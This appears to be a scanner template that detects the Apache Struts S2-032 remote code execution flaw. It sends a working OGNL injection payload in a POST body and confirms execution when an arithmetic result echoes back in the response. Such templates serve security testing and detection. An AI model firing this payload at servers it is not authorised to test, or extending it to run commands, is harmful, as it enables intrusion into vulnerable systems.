id: struct-s2-032
info:
  name: Apache Struct S2-032 - RCE
  risk: High

requests:
  - method: POST
    redirect: true
    url: >-
      {{.BaseURL}}{{.Path}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: >-
      method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(6111666687-100),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "6111666587")

reference:
  author: theblackturtle
